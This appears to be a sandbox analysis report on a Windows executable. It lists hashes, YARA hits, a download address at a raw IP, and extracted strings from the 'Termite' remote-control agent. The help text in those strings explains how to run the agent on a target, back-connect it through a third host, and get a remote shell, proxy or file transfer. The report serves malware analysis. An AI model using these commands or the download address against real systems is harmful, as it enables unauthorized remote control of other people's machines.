Sample details: 2820653437d5935d94fcb0c997d6f13c --

Hashes
MD5: 2820653437d5935d94fcb0c997d6f13c
SHA1: 5c0b49e4c2671805e78948aa30beb21aa45346d2
SHA256: b2b2e900aa2e96ff44610032063012aa0435a47a5b416c384bd6e4e58a048ac9
SSDEEP: 768:kO9FDI/xwFkZjHFCNEOla8trgJo6HTcAs2UNddE5hIJDpzMhh6R:/DOP7FCKOlFGJoKoAs2f5hWpghh
Details
File Type: PE32
Yara Hits
YRP/IsPE32 | YRP/IsConsole | YRP/IsBeyondImageSize | YRP/domain | YRP/IP | YRP/url | YRP/contentis_base64 | YRP/Misc_Suspicious_Strings |
Source
http://173.199.71.172/agent_Win32.exe
Strings
		!This program cannot be run in DOS mode.
P`.data
.rdata
0@.eh_fram
0@.bss
.idata
127.0.0.1
libgcc_s_dw2-1.dll
__register_frame_info
libgcj-13.dll
_Jv_RegisterClasses
__deregister_frame_info
[ ERROR    ]  
WSAStartup failed!
cmd.exe
bind wrong.
Socket Server Starting now !
server start error pvalue is NULL
Got A Shell Session Here >>
start a new cmd shell here
GoodBye ! Shell Session Closed Now .
remember free this tree
node_id = %d ,child_num = %d,k = %d
res = 0? child_num = %d, k = %d
Zero tree
MacOSX
Windows
Arm-Linux
Unknow-OS
SOCKSv4 Not Support now!
the recv ip is %s
Something error on read URL
the read url is %s 
Not support IPv6?
NOT IPv4 IPv6 and URL ?
 Tcp ---> %s:%d 
Not support  UDP?
[ WARNNING ]  
--> %3d <-- (close)used/unused  %d/%d
Please wait a moment... I will try my best to release more resources.
--> %3d <-- (open)used/unused  %d/%d
[ OK       ]  
New Agent(%d) Online. Its father(%d)..
[ ERROR    ]  
CloseJob Error 1111
Unsupport now %d
UNKNOWN proto->cmdType %d
[ ERROR    ]  
add error ????
NodeType is error
Send info Error
[ OK       ]  
[recv ]id = %d,ostype = %d , nodetype = %d, pcname = %s
info == NULL or myself == NULL
UNKNOWN client node type %d
[ ERROR    ]  
list is null or List-> joblist is NULL
describe :%s , %d
[ ERROR    ]  
conn is NULL
proto is NULL
PROTOBUFLEN_OVERFLOW !!!!!
PROTO_RecvProto recv len error
[ ERROR    ]  
NEW TUNNEL to %d Build Error
nextconn == M_GETTARGETCONN_ERROR targetid = %d
M_BUILDDIRECTTUNNEL_ERROR targetid = %d
M_BUILDREVERSETUNNEL_ERROR targetid = %d
UNKNOWN nextconn -> ConnType
[ ERROR    ]  
GLOBAL_SetJobList NULL joblist
GLOBAL_GetJobList NULL joblist
No Name Now
[ OK       ]  
MY ID IS %d, Upper ID is %d
{id:%d,OSType:%d,pcname:%s,linktype:%d}
***************1 Neighbor node list ************
*************** Tree node map      ************
my id is %d now.
[ ERROR    ]  
nrecv (%d) != maxlen (%d)
m_fun_server_cbf no CBF fun????
[ ERROR    ]  
pvalue is NULL
conn is NULL
BuildTargetSock Error
[ ERROR    ]  
RECV MSG ERROR
[ OK       ]  
New_Message_Here -->%s
[ ERROR    ]  
Open %s File Error
[ OK       ]  
UPFile CMD exec Ok !
Open %s File error
[ ERROR    ]  
Recv CMDMsg Error
CCProxy_onNewTunnel Error CMD(%d)
l:c:p:hvadq
listen
tohost
toport
version
detailed
This Client Node
c is %d
[ OK       ]  
Listening --> 0.0.0.0:%d
Connect to --> %s:%d
Beta 1.0
VERSION : %s
	$ ./xxx -h
	$ ./xxx -l [lport]
	$ ./xxx -c [rhost] -p [rport]
---------
options :
Listen a local port.
%4s %-8s %s
Remote host address.
The port on remote host.
This help page.
Show the version.
Show the about text.
Show the detailed text.
          ."'".
      .-./ _=_ \.-.
     {  (,(oYo),) }}
     {{ |   "   |} }
     { { \(---)/  }}
     {{  }'-=-'{ } }
     { { }._:_.{  }}
     {{  } -:- { } }
     {_{ }'==='{  _}
    ((((\)     (/))))
Termite
 %s is a Machine Control Tool.It has many advantages.
 There is a level-1 tool before ,you can find it from 
 http://www.rootkiter.com/EarthWorm/ .
 On the basis of 'EarthWorm',I added a built-in shell,
 then add so much commands there. You can find more 
 discription by add '-h' and '-d' parameter.
 Contributors
 rootkiter : The creator
 wooyaa    : Proviede some advice
 syc4mor3  : Named for this tool
 1. You can control multiple hosts at the same time
   In "admin_exe" there is a built-in shell.
   So that,you can do different operation at the same time.
 2. It support Multiple control command.
    1. Lcx_Tran       2. SOCKSv5 Server
    3. Shell-Server   4. Upload file 
    5. Download file  
 3. You can manage Common e-machine.
   It support various OS or CPU.For example:
        Linux  (x86/x64/Arm/Mipsel);
        Windows(x86/x64);
        MacOS  (x64);
       More is coming...
 4. You can use it on the Intranet or Extranet.
   Eg:
   4-1: When target has public IP,manage it with direct mode.
      a-step) Run agent on target host:
        $ ./agent_exe -l 8888
      b-step) Manage it with connect it
        $ ./admin_exe -c [target-ip] -p 8888 .
   4-2. When target in a remote Extranet.You can Manage it
        through a third-HOST(With public IP).
      a-step) Run agent on third-HOST:
      b-step) back-connect third-HOST from target with agent
        $ ./agent_exe -c [third-HOST ip] -p 8888
      c-step) Manage target through third-HOST
        $ ./admin_exe -c [third-HOST ip] -p 8888
 5. You can manage remote hosts through a multi-level cascade.
   In the build-in shell,there is a "connect" or "listen" 
   command,you can use it recv another agent,then manage the  
   new agent together.
Beta 1.0
VERSION : %s
Mingw runtime failure:
  VirtualQuery failed for %d bytes at address %p
  Unknown pseudo relocation protocol version %d.
  Unknown pseudo relocation bit size %d.
%s: option requires an argument -- %c
%s: unrecognised option `-%s'
%s: invalid option -- %c
option `%s%s' doesn't accept an argument
option `%s%s' requires an argument
%s: option `%s' is ambiguous
%s: unrecognised option `%s'
POSIXLY_CORRECT
GCC: (GNU) 4.8.1
GCC: (GNU) 4.8.1
GCC: (GNU) 4.8.1
GCC: (GNU) 4.8.1
GCC: (GNU) 4.8.1
GCC: (GNU) 4.8.1
GCC: (GNU) 4.8.1
GCC: (GNU) 4.8.1
GCC: (GNU) 4.8.1
GCC: (GNU) 4.8.1
GCC: (GNU) 4.8.1
GCC: (GNU) 4.8.1
GCC: (GNU) 4.8.1
GCC: (GNU) 4.8.1
GCC: (GNU) 4.8.1
GCC: (GNU) 4.8.1
GCC: (GNU) 4.8.1
GCC: (GNU) 4.8.1
GCC: (GNU) 4.8.1
GCC: (GNU) 4.8.1
GCC: (GNU) 4.8.1
GCC: (GNU) 4.8.1
GCC: (GNU) 4.8.1
GCC: (GNU) 4.8.1
GCC: (GNU) 4.8.1
GCC: (GNU) 4.8.1
GCC: (GNU) 4.8.1
GCC: (GNU) 4.8.1
GCC: (GNU) 4.8.1
GCC: (GNU) 4.8.1
GCC: (GNU) 4.8.1
GCC: (GNU) 4.8.1
GCC: (GNU) 4.8.1
GCC: (GNU) 4.8.1
GCC: (GNU) 4.8.1
GCC: (GNU) 4.8.1
CreateProcessA
CreateThread
DeleteCriticalSection
EnterCriticalSection
ExitProcess
GetLastError
GetModuleHandleA
GetProcAddress
InitializeCriticalSection
LeaveCriticalSection
SetUnhandledExceptionFilter
TlsGetValue
VirtualProtect
VirtualQuery
__getmainargs
__p__environ
__p__fmode
__set_app_type
_cexit
_onexit
_setmode
atexit
calloc
fclose
fprintf
fwrite
getenv
malloc
memcpy
memset
printf
putchar
signal
sprintf
strcpy
strlen
strncpy
vfprintf
WSASocketA
WSAGetLastError
WSAStartup
__WSAFDIsSet
accept
connect
gethostbyname
inet_ntoa
listen
select
shutdown
KERNEL32.dll
msvcrt.dll
WS2_32.dll
WSOCK32.DLL